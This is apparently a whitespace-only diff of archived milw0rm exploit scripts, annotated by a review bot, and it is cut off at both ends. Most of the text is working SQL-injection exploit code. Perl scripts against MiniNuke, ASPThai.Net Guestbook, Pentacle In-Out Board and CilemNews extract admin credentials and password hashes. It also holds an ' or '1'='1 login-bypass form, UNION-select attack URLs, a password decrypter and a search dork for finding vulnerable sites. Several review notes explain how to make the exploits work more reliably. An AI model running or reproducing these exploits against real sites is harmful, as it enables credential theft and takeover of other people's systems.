$proxy = $ARGV[3];
print "----------------------------------\n";
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
($proxyAddr,$proxyPort) = split(/:/, $proxy);
}
$serv =~ s/(http:\/\/)//eg;
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
print "Connecting to: $serv...\n";
print $proxy?"Using proxy: $proxy \n":"";
$socket = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$socket>) {
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n";
exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
}
print "Exploit failed\n";
print "--------------------------\n";
# milw0rm.com [2006-01-14]
#!/usr/bin/perl
# MiniNuke (www.miniex.net) Version: <= 1.8.2 SQL-injection exploit.
# This exploit uses the vulnerability discovered by nukedx@nukedx.com.
# Exploit uses SQl-injection to give you the hash from user with chosen id.
# DetMyl, 2006 Detmyl@bk.ru
use IO::Socket;
if (@ARGV < 3)
{
print q(
+++++++++++++++++++++++++++++++++++++++++++++++++++
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
++++++++++++++++++++++++++++++++++++++++++++++++++++
);
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$uid = $ARGV[2];
$proxy = $ARGV[3];
print "----------------------------------\n";
if ( defined $proxy) {
$proxy =~ s/(http:\/\/)//eg;
($proxyAddr,$proxyPort) = split(/:/, $proxy);
}
$serv =~ s/(http:\/\/)//eg;
$request ="http://".$serv.$dir."news.asp?Action=Print&hid=66%20union+select+0,sifre,0,0,0,0,0,0,0,0+from+members+where+uye_id=".$uid;
print "Connecting to: $serv...\n";
print $proxy?"Using proxy: $proxy \n":"";
$socket = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $proxyAddr?"$proxyAddr":"$serv",
PeerPort => $proxyPort?"$proxyPort":"80")
|| die "can't connect to: $serv\n";
print $socket "GET $request HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$socket>) {
if ($answer =~ /<b>([\d,a-f]{32})<\/b>/) {
print "+ Found! The hash for user $uid: $1\n";
print "----------------------------------\n";
exit(); }
if ($answer =~ /number of columns/) { print "+ Vulnerable! But no result with default querry, so manually change the scrypt;-)...\n";exit(); }
}
print "Exploit failed\n";
print "--------------------------\n";
# milw0rm.com [2006-01-14]
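Review bot: the hash regex `/<b>([\d,a-f]{32})<\/b>/` has a literal comma inside the character class, so `[\d,a-f]` accepts commas as well as hex digits; `[0-9a-f]{32}` is what is meant. Two smaller points in the same file: `s/(http:\/\/)//eg` uses the `/e` flag with an empty replacement, which evaluates nothing and is misleading, and the request is written with bare `\n` line endings (`"GET $request HTTP/1.1\n"`, `"Connection: close\n\n"`) where HTTP/1.1 specifies `\r\n`. The old and new sides are identical text, so the change is whitespace only.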

View file

@ -1,93 +1,93 @@
#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email = zodiac@g00ns.net
#(c) 2006
use LWP::UserAgent;
use HTTP::Cookies;
$Server = $ARGV[0];
if($Server =~m/http/g)
{
$Server=~ 'http://$Server';
print
}
else {
print $error;
}
if(!$Server) {usage();exit() ;}
head();
print "\r\nGrabbing Username And Password\r\n\n";
#Login's and stores a cookie to view admin panel later
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar);
$res = $xpl->post(
$Server.'check_user.asp',
Content => [
'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'Submit' => '-= Login =-',
],
);
# Create a request
my $req = HTTP::Request->new(GET =>
$Server.'change_admin_username.asp'
);
$req->header('Referer', $Server.'admin_menu.asp');
my $res = $xpl->request($req);
$info= $res->content;
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{
die "Error Connecting...\r\n";
}
#Check the outcome of the response
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$User = $2;
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$Pass= $2;
print "UserName:$User\r\nPassword:$Pass\r\n";
sub head()
{
print "\n=======================================================================\r\n";
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";
print "=======================================================================\r\n";
}
sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print "=======================================================================\r\n";
# milw0rm.com [2006-02-06]
#!/usr/bin/perl
# SQL Injection Exploit for ASPThai.Net Guestbook <= 5.5
#(And possible higher could not find a site to test it on)
# This exploit shows the username of the administrator and the password In plain text
# Bug Found by muderskillz Coded by Zodiac
# Shouts to cijfer,uid0,|n|ex,ph4tel,z3r0,lethal, Felosi,seven,Spic and anyone else I forgot.
# http://exploitercode.com/ http://www.g00ns.net
#irc.g00ns.net #g00ns email = zodiac@g00ns.net
#(c) 2006
use LWP::UserAgent;
use HTTP::Cookies;
$Server = $ARGV[0];
if($Server =~m/http/g)
{
$Server=~ 'http://$Server';
print
}
else {
print $error;
}
if(!$Server) {usage();exit() ;}
head();
print "\r\nGrabbing Username And Password\r\n\n";
#Login's and stores a cookie to view admin panel later
$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->agent('g00ns');
$xpl->cookie_jar($cookie_jar);
$res = $xpl->post(
$Server.'check_user.asp',
Content => [
'txtUserName' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'txtUserPass' => '\' or \'%67%30%30%6e%73\'=\'%67%30%30%6e%73',
'Submit' => '-= Login =-',
],
);
# Create a request
my $req = HTTP::Request->new(GET =>
$Server.'change_admin_username.asp'
);
$req->header('Referer', $Server.'admin_menu.asp');
my $res = $xpl->request($req);
$info= $res->content;
if($info =~ m/Unauthorised\sAccess|The\spage\scannot\sbe\sfound/)
{
die "Error Connecting...\r\n";
}
#Check the outcome of the response
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$User = $2;
$info=~m/(value=\")(\n+|\w+|\W+)/g;
$Pass= $2;
print "UserName:$User\r\nPassword:$Pass\r\n";
sub head()
{
print "\n=======================================================================\r\n";
print "* ASPThai.Net Guestbook version 5.5 SQL Injection by www.g00ns.net *\r\n";
print "=======================================================================\r\n";
}
sub usage()
{
head();
print " Usage: Thaisql.pl <Site> \r\n\n";
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
print "=======================================================================\r\n";
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
print "=======================================================================\r\n";
# milw0rm.com [2006-02-06]
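Review bot: `sub usage()` opens a block at `{` that is never closed before the trailer comment, so the file does not compile (`Missing right curly`); the scheme handling at the top is also inverted and ineffective: `if($Server =~m/http/g)` takes the branch when a scheme is already present, `$Server=~ 'http://$Server';` is a pattern match against a single-quoted (non-interpolated) string rather than an assignment, and `print $error;` prints a variable that is never assigned. Both sides of this hunk carry the same text, so the diff itself is whitespace normalization and the broken block is pre-existing.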

View file

@ -1,50 +1,50 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Orginal advisory: http://www.nukedx.com/?viewdoc=9
#Usage: mini.pl <victim.com> </mininuke-dir> <userid>
use IO::Socket;
if(@ARGV != 3){
print "
+**********************************************************************+
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
+ Usage: mini.pl <victim> <directory> <userid> +
+ Example: mini.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+**********************************************************************+
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$port = "80";
$mndir = $ARGV[1];
$victimid = $ARGV[2];
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $mns "GET $sreq\n";
print $mns "Host: $server\n";
print $mns "Accept: */*\n";
print $mns "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$mns>) {
if ($answer =~ /([\d,a-f]{32})/) {
print "+ USERID: $victimid\n";
print "+ MD5 HASH: $1\n";
print "+**********************************************************************+\n";
exit(); }
if ($answer =~ /number of columns/) {
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
print "+ So please edit query by manually adding null data..\n";
exit(); }
}
print "+ Exploit failed\n";
print "+**********************************************************************+\n";
# nukedx.com [2006-02-19]
# milw0rm.com [2006-02-19]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Orginal advisory: http://www.nukedx.com/?viewdoc=9
#Usage: mini.pl <victim.com> </mininuke-dir> <userid>
use IO::Socket;
if(@ARGV != 3){
print "
+**********************************************************************+
+Welcome to MiniNuke CMS System all versions (pages.asp) SQL-inject xpl+
+ Usage: mini.pl <victim> <directory> <userid> +
+ Example: mini.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+**********************************************************************+
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$port = "80";
$mndir = $ARGV[1];
$victimid = $ARGV[2];
$sreq ="http://".$server.$mndir."pages.asp?id=3%20union+select+0,kul_adi,sifre,0,0+from+members+where+uye_id=".$victimid;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$mns = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $mns "GET $sreq\n";
print $mns "Host: $server\n";
print $mns "Accept: */*\n";
print $mns "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$mns>) {
if ($answer =~ /([\d,a-f]{32})/) {
print "+ USERID: $victimid\n";
print "+ MD5 HASH: $1\n";
print "+**********************************************************************+\n";
exit(); }
if ($answer =~ /number of columns/) {
print "+ This version of Mini-Nuke is vulnerable too but default query of SQL-inject does not work on it\n";
print "+ So please edit query by manually adding null data..\n";
exit(); }
}
print "+ Exploit failed\n";
print "+**********************************************************************+\n";
# nukedx.com [2006-02-19]
# milw0rm.com [2006-02-19]
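Review bot: the request line `print $mns "GET $sreq\n";` carries no HTTP version, which makes it an HTTP/0.9 simple request, yet the script goes on to send `Host:`, `Accept:` and `Connection:` header lines that HTTP/0.9 does not define; the intended form is `GET <path> HTTP/1.1\r\n` followed by `\r\n`-terminated headers. The match `/([\d,a-f]{32})/` repeats the literal-comma class already noted for mini-nuke.pl and, without the `<b>` anchors used there, will match any 32-character run of hex digits and commas anywhere in the page. Both sides of the hunk are identical text; the change is whitespace only.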

View file

@ -1,70 +1,70 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: penta.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket;
if(@ARGV < 3){
print "
+***********************************************************************+
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
+ Usage: penta.pl <victim> <directory> <userid> +
+ Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver;
$port = "80";
$pentadir = $ARGV[1];
$pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $pentaserver\n";
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $penta "GET $pentareq\n";
print $penta "Host: $pentaserver\n";
print $penta "Accept: */*\n";
print $penta "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$penta>) {
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?)&nbsp;/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Try another userid maybe this one not the admin.\n";
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: penta.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=14
use IO::Socket;
if(@ARGV < 3){
print "
+***********************************************************************+
+Pentacle In-Out Board <= 6.03 (newsdetailsview.asp) Remote SQL-Inj. XPL+
+ Usage: penta.pl <victim> <directory> <userid> +
+ Example: penta.pl sux.com / 1 +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$pentaserver = $ARGV[0];
$pentaserver =~ s/(http:\/\/)//eg;
$pentahost = "http://".$pentaserver;
$port = "80";
$pentadir = $ARGV[1];
$pentaid = $ARGV[2];
$pentatar = "newsdetailsview.asp?newsid=";
$pentafinal = "login.asp";
$pentaxp = "11%20union%20select%200,userpassword,0,username,0,0,0,0%20from%20pt_users%20where%20userid=".$pentaid."%20and%20useradmin=yes";
$pentareq = $pentahost.$pentadir.$pentatar.$pentaxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $pentaserver\n";
$penta = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$pentaserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $penta "GET $pentareq\n";
print $penta "Host: $pentaserver\n";
print $penta "Accept: */*\n";
print $penta "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$penta>) {
if ($answer =~ /class=\"newsdetailtitle\">(.*?)<\/td>/){
print "+ Exploit succeed! Getting USERID: $pentaid admin login information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /<td align=\"right\" class=\"style9px\">(.*?)&nbsp;/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $pentahost$pentadir$pentafinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of Pentacle In-Out Board is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Try another userid maybe this one not the admin.\n";
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25]
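Review bot: the request line `print $penta "GET $pentareq\n";` sends an absolute URL with no HTTP version, so the server sees an HTTP/0.9-style request line followed by HTTP/1.x headers (`Host:`, `Accept:`, `Connection:`); a strict server treats the whole thing as HTTP/0.9 and ignores or rejects those headers. The BetaParticle and ASPPortal scripts further down in this commit write `GET ... HTTP/1.1` and are the consistent form. Two smaller points: `s/(http:\/\/)//eg` uses the `/e` flag to evaluate an empty replacement as Perl code, where a plain `s{^http://}{}` is what is meant, and there is no `use strict;`, so a typo in any of the `$penta*` globals would fail silently rather than at compile time. For anyone reviewing web server logs, the request is distinctive: `newsdetailsview.asp?newsid=` followed by `%20union%20select%20` and `from%20pt_users`, plus the malformed request line above. On the application side, `newsid` is an integer and should be validated and bound as one, which removes the injection entirely.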


@ -1,36 +1,36 @@
<html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
<script language=javascript>
function ptxpl(){
if(document.xpl.victim.value=="") {
alert("Please enter site!");
return false;
}
if(confirm("Are you sure?")) {
xpl.action="http://"+document.xpl.victim.value+"/login.asp";
xpl.username.value=document.xpl.username.value;
xpl.userpassword.value=document.xpl.userpassword.value;
xpl.submit();
}
}
</script>
<strong>
<font face="Tahoma" size="2">
Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br>
Example: host.com<br>
Example2: host.com/ptdir/<br>
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username" value="any">
<input type="hidden" name="userpassword" value="' or '1'='1">
<input type="submit" value="Send">
</table></form>
</html>
Save this code as .htm and then execute.
# nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25]
<html>
<title>Pentacle In-Out Board <= 6.03 (login.asp) Authencation ByPass Vulnerability</title>
<script language=javascript>
function ptxpl(){
if(document.xpl.victim.value=="") {
alert("Please enter site!");
return false;
}
if(confirm("Are you sure?")) {
xpl.action="http://"+document.xpl.victim.value+"/login.asp";
xpl.username.value=document.xpl.username.value;
xpl.userpassword.value=document.xpl.userpassword.value;
xpl.submit();
}
}
</script>
<strong>
<font face="Tahoma" size="2">
Fill in the blank !:D<br>
Just enter host/path/ not http://host/path/!<br>
If Pentacle installed on / just enter host<br>
Example: host.com<br>
Example2: host.com/ptdir/<br>
<form name="xpl" method="POST" action="http://pentacle.g2soft.net/login.asp" onsubmit=ptxpl();>
Target -> <input type="text" name="victim" value="pentacle.g2soft.net" size="50">
<input type="hidden" name="username" value="any">
<input type="hidden" name="userpassword" value="' or '1'='1">
<input type="submit" value="Send">
</table></form>
</html>
Save this code as .htm and then execute.
# nukedx.com [2006-02-25]
# milw0rm.com [2006-02-25]
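Review bot: `onsubmit=ptxpl();` in the `<form>` tag discards the function's return value, so the `return false;` inside `ptxpl()` never cancels submission; with an empty `victim` field the alert fires and the form still posts to the hard-coded default `action`. The conventional form is `onsubmit="return ptxpl();"`. The markup is also malformed: `</table>` closes a table that was never opened, `<strong>` and `<font>` are never closed, there is no `<head>` or `<body>`, and the title misspells "Authentication". On the vulnerability itself, the hidden `userpassword` value `' or '1'='1` is the classic tautology that turns a string-concatenated `WHERE username='...' AND userpassword='...'` check into one that matches every row; the fix in `login.asp` is a parameterized query (in classic ASP, `ADODB.Command` with `CreateParameter`) and a comparison against a salted hash of the submitted password, after which no submitted value can change the structure of the query.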


@ -1,66 +1,66 @@
Original advisory: http://www.nukedx.com/?viewdoc=18
Advisory by: nukedx
Full PoC
Explotation:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
<--Decrypter code-->
<--Note: This decrypter just decrypts default data
If webmaster changed te_chave value in funcoes.asp
this decrypter wont decrypt data so you need to
make your own decrypter
-->
<--C Source-->
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";
for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
<--End of code-->
<--Thanks |SaMaN| for decrypter-->
// milw0rm.com [2006-03-04]
Original advisory: http://www.nukedx.com/?viewdoc=18
Advisory by: nukedx
Full PoC
Explotation:
GET -> http://[victim]/[dir]/index.asp?secao=[PageID]&id=[SQL]
EXAMPLE 1 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha,senha+from+administradores
EXAMPLE 2 -> http://[victim]/[dir]/index.asp?secao=25&id=-1+UNION+select+login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login,login+from+administradores
with example 1 remote attacker can get admin's encrypted password and with example 2 remote attacker can get admin's login name
[PageID]: must be working page id you can get some from frontpage.
<--Decrypter code-->
<--Note: This decrypter just decrypts default data
If webmaster changed te_chave value in funcoes.asp
this decrypter wont decrypt data so you need to
make your own decrypter
-->
<--C Source-->
/*********************************************
* TotalECommerce PWD Decrypter *
* Coded by |SaMaN| for nukedx *
* http://www.k9world.org *
* IRC.K9World.Org *
*Advisory: http://www.nukedx.com/?viewdoc=18 *
**********************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
int main()
{
char buf[255];
char buf2[255];
char buf3[255];
char *texto;
char *vcrypt;
int i,x,z,t = 0;
char saman;
texto = buf;
vcrypt = buf2;
printf("%s", "|=------------------------------------=|\n");
printf("%s", " Coded by |SaMaN| @ IRC.K9World.Org\n");
printf("%s", "|=------------------------------------=|\n\n");
printf("%s", "Enter crypted password: ");
scanf("%200s", buf);
if (!texto)
vcrypt = "";
for (i = 0; i < strlen(texto); i++)
{
if ((vcrypt == "") || (i > strlen(texto)))
x = 1;
else
x = x + 1;
t = buf[i];
z = 255 - t;
saman = toascii(z);
snprintf(buf3, 250, "%c", saman);
strncat(buf2, buf3, 250);
}
printf("Result: %s\n", buf2);
return;
}
<--End of code-->
<--Thanks |SaMaN| for decrypter-->
// milw0rm.com [2006-03-04]
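Review bot: in the C decrypter, `buf2` is never initialized before the first `strncat(buf2, buf3, 250);`, so `strncat` searches uninitialized stack memory for a terminating NUL and appends the result after whatever it finds there; `buf2[0] = '\0';` (or `memset(buf2, 0, sizeof buf2);`) before the loop is required for the `printf("Result: %s\n", buf2);` to be meaningful. Further defects: `vcrypt == ""` compares the pointer with the address of a string literal, never its contents; `x` is read before it is ever assigned in `x = x + 1` (harmless only because `x` is never used); `if (!texto)` can never be true because of `texto = buf;` two lines earlier; `<stdlib.h>` is included but unused; and `return;` in `int main()` returns no value, which C99 rejects for a non-`void` function. The transform itself is the instructive part for defenders: each output byte is `255 - t` passed through `toascii()`, i.e. a fixed byte-wise substitution with no key material beyond the default `te_chave`, so the "encrypted" passwords in `administradores` are recoverable by anyone who can read the table. The application-level fix is to store salted password hashes and to validate and bind the `id` parameter of `index.asp` as an integer, so the UNION query in the examples cannot be introduced in the first place.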


@ -1,68 +1,68 @@
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket;
if(@ARGV < 2){
print "
+***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+ Usage: cilem.pl <victim> <directory> +
+ Example: cilem.pl sux.com / +
+ googledork [ inurl:yazdir.asp?haber_id= ] +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver;
$port = "80";
$cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n";
print $cilem "Host: $cilemserver\n";
print $cilem "Accept: */*\n";
print $cilem "Connection: close\n\n";
print "+ Connected!...\n";
while($answer = <$cilem>) {
if ($answer =~ /font-weight:700\">(.*?)<\/b><\/td>/){
print "+ Exploit succeed! Getting admin's information.\n";
print "+ ---------------- +\n";
print "+ USERNAME: $1\n";
}
if ($answer =~ /(.*?)<\/font><\/td>/) {
print "+ PASSWORD: $1\n";
print "+ ---------------- +\n";
print "+ Lets go $cilemhost$cilemdir$cilemfinal and\n+ Login with this information. \n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /Internal Server Error/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
if ($answer =~ /number of columns/) {
print "+ This version of CilemNews is vulnerable too but default query of SQL-inject doesnt work on it\n";
print "+ So please edit query by manually adding or removing null datas..\n";
print "+**********************************************************************+\n";
exit();
}
}
print "+ Exploit failed :(\n";
print "+**********************************************************************+\n";
# milw0rm.com [2006-03-07]
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com
#Usage: cilem.pl <victim> <directory>
#Original Advisory: http://www.nukedx.com/?viewdoc=10
#googledork [ inurl:yazdir.asp?haber_id= ] 2.140 pages...
use IO::Socket;
if(@ARGV < 2){
print "
+***********************************************************************+
+Welcome to CilemNews System <= 1.1 (yazdir.asp haber_id) SQL-inject xpl+
+ Usage: cilem.pl <victim> <directory> +
+ Example: cilem.pl sux.com / +
+ googledork [ inurl:yazdir.asp?haber_id= ] +
+ Method found & Exploit scripted by nukedx +
+***********************************************************************+
";
exit();
}
#Local variables
$cilemserver = $ARGV[0];
$cilemserver =~ s/(http:\/\/)//eg;
$cilemhost = "http://".$cilemserver;
$port = "80";
$cilemdir = $ARGV[1];
$cilemtar = "yazdir.asp?haber_id=";
$cilemfinal = "admin/giris.asp";
$cilemxp = "1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin";
$cilemreq = $cilemhost.$cilemdir.$cilemtar.$cilemxp;
#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $cilemserver\n";
$cilem = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$cilemserver", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $cilem "GET $cilemreq\n";
